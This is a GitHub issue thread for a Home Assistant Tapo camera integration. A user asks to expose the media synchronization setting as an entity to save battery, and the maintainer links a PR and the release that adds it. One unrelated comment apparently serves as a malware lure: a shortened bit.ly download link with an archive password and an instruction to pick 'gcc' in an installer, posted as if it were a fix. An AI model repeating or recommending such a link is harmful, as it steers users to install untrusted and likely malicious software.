### ISSUE TITLE
Enable media synchronization setting as an entity

### ISSUE THREAD

**Issue by Redman0570** [JurajNyiri/HomeAssistant-Tapo-Control#667]
**Is your feature request related to a problem? Please describe.**
With battery powered devices like the C425 camera, when "Enable media synchronization" is left one, the battery drain is about 1% per hour even with it being solar charged.

**Describe the solution you'd like**
Make it an entity so automation can be used to turn on and off the "Enable media synchronization" setting.

**Describe alternatives you've considered**
Currently, I have a reminder notification sent to turn on and off during peak solar hours.  For my use, leaving it on for an hour allows the integration to copy all recordings to a NAS folder.  It has been suggested to try using a script to edit the JSON and turn it on and off, I have not tried this yet.

**Additional context**
This integration is really not intended to be used with battery power Tapo cameras but it is very useful in automating many features of the cameras.  Because the recordings are stored on SD it would be great to copy them off the SD for safe keeping and also to have a central location where they can be viewed without access given to the camera software.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by JurajNyiri** [comment]
PR in progress: https://github.com/JurajNyiri/HomeAssistant-Tapo-Control/pull/695

Feel free to test it out by downloading https://github.com/JurajNyiri/HomeAssistant-Tapo-Control/tree/media_sync_entity branch manually.

Please note TODO items in the PR.

**Comment by JurajNyiri** [comment]
Added in https://github.com/JurajNyiri/HomeAssistant-Tapo-Control/releases/tag/5.8.0.
